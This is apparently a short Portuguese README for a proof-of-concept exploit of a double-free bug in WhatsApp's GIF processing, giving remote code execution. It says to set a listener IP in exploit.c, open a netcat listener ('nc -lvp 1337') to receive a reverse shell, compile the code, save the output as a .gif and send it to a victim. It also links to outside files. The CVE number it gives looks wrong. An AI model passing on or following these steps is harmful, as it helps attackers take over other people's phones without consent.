
Prova de conceito de exploit para CVE-2020-11932, uma vulnerabilidade de double-free no processamento de GIF do WhatsApp, que permite execução remota de código por meio de um arquivo .gif malicioso.
Bug de double-free no PoC do exploit do WhatsApp.
#Nota: Certifique-se de definir o IP do listener em exploit.c para obter a shell
nc -lvp 1337 ou qualquer porta.
e depois compile.
make
ou
gcc -o exploit egif_lib.c exploit.c
então execute ./exploit e salve o conteúdo em .gif
e envie para a vítima.
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.
https://drive.google.com/file/d/1XP7K5zkKEhmbEONvRpjrkTQ5pwpBc6G_/view?usp=sharing